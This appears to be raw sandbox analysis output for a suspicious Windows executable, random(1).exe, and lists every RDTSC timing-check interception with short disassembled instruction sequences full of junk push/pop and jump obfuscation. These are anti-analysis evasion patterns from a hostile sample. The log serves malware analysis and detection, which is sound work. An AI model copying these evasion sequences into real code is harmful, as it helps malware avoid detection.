Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCB28 second address: 10BCB3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F06D851854Ah 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCE11 second address: 10BCE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC7B second address: 108EC8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC8D second address: 108EC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC93 second address: 108EC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC97 second address: 108EC9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EC9B second address: 106B72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F06D8518548h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 call dword ptr [ebp+122D281Dh] 0x0000002b jmp 00007F06D8518559h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108EE30 second address: 108EE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F244 second address: 108F248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F248 second address: 108F256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F06D8B4D9CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F466 second address: 108F48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jl 00007F06D8518548h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jnl 00007F06D851854Ch 0x00000016 jo 00007F06D851854Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F687 second address: 108F6B6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F06D8B4D9C8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, 48FEDA1Ch 0x00000014 push 00000004h 0x00000016 mov edx, dword ptr [ebp+122D2B63h] 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F06D8B4D9CEh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6B6 second address: 108F6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6BA second address: 108F6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6C0 second address: 108F6C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F6C6 second address: 108F6CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FA04 second address: 108FA58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 js 00007F06D8518556h 0x0000000b jmp 00007F06D8518550h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F06D8518548h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D215Ah], eax 0x00000031 push 0000001Eh 0x00000033 push edi 0x00000034 xor dword ptr [ebp+122D36F3h], eax 0x0000003a pop ecx 0x0000003b nop 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push ecx 0x00000040 pop ecx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FA58 second address: 108FA66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108FDC6 second address: 108FE88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F06D851854Ah 0x0000000f nop 0x00000010 jmp 00007F06D851854Dh 0x00000015 lea eax, dword ptr [ebp+124929EEh] 0x0000001b jns 00007F06D8518560h 0x00000021 push eax 0x00000022 jmp 00007F06D8518551h 0x00000027 mov dword ptr [esp], eax 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F06D8518548h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Bh 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 mov dword ptr [ebp+12453EE4h], esi 0x0000004a add edx, 371AEF37h 0x00000050 lea eax, dword ptr [ebp+124929AAh] 0x00000056 nop 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F06D8518559h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AB2 second address: 10C0AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CEh 0x00000007 jmp 00007F06D8B4D9D1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AD5 second address: 10C0AEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0AEF second address: 10C0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jl 00007F06D8B4D9E2h 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0B07 second address: 10C0B14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F06D8518546h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0B14 second address: 10C0B18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F231 second address: 108F235 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108F235 second address: 108F244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D52 second address: 10C0D6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D6B second address: 10C0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D6F second address: 10C0D75 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D75 second address: 10C0D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D94 second address: 10C0D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C0D99 second address: 10C0DAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CAh 0x00000007 js 00007F06D8B4D9CEh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C13C5 second address: 10C13FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F06D8518550h 0x00000019 jmp 00007F06D8518551h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C13FA second address: 10C1408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F06D8B4D9C8h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C1575 second address: 10C158F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F06D8518546h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F06D851854Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C158F second address: 10C15B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9CDh 0x00000009 jmp 00007F06D8B4D9D0h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94BA second address: 10C94C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94C0 second address: 10C94CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8B4D9CAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C94CF second address: 10C94DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8518546h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C98B1 second address: 10C98B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C98B8 second address: 10C98BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9A03 second address: 10C9A0E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9A0E second address: 10C9A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DE3 second address: 10C9DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DE9 second address: 10C9DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9DEF second address: 10C9DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10C9F56 second address: 10C9F6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518550h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10CF571 second address: 10CF57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10CF57B second address: 10CF585 instructions: 0x00000000 rdtsc 0x00000002 js 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E73 second address: 10D1E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E79 second address: 10D1E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518558h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1E97 second address: 10D1EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D1EA3 second address: 10D1EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D2038 second address: 10D203C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D2192 second address: 10D219D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F06D8518546h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D979D second address: 10D97B8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F06D8B4D9CEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F06D8B4D9C6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EBA second address: 10D9EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EBE second address: 10D9EF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8B4D9D8h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8B4D9CFh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9EF3 second address: 10D9F2A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8518546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F06D851854Ch 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F06D8518559h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10D9F2A second address: 10D9F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DA0D0 second address: 10DA0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD703 second address: 10DD707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD707 second address: 10DD715 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F06D851854Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD715 second address: 10DD720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD720 second address: 10DD754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F06D8518553h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F06D851854Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F06D851854Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DCD50 second address: 10DCD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD01B second address: 10DD025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD025 second address: 10DD03D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD03D second address: 10DD068 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518555h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD068 second address: 10DD06C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD3E2 second address: 10DD405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jmp 00007F06D8518550h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD405 second address: 10DD40B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD40B second address: 10DD428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518558h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD428 second address: 10DD441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10DD441 second address: 10DD445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E1FCB second address: 10E1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E22A2 second address: 10E22A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E255E second address: 10E2562 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E2562 second address: 10E259A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Ch 0x00000007 jnc 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jnc 00007F06D851855Dh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E26C7 second address: 10E26E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D8B4D9C6h 0x00000008 jmp 00007F06D8B4D9CCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007F06D8B4D9CCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E26E9 second address: 10E26EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E26EF second address: 10E26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EBBD1 second address: 10EBBF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007F06D8518546h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop esi 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EBBF3 second address: 10EBBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EBBFB second address: 10EBC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E9B6D second address: 10E9B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10E9B72 second address: 10E9B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F06D8518546h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EA0E7 second address: 10EA131 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F06D8B4D9D7h 0x0000000f jmp 00007F06D8B4D9D1h 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 ja 00007F06D8B4D9C6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jng 00007F06D8B4D9C6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EA47B second address: 10EA499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F06D8518556h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EAD00 second address: 10EAD05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB27F second address: 10EB2A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8518551h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D851854Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10EB2A4 second address: 10EB2AA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
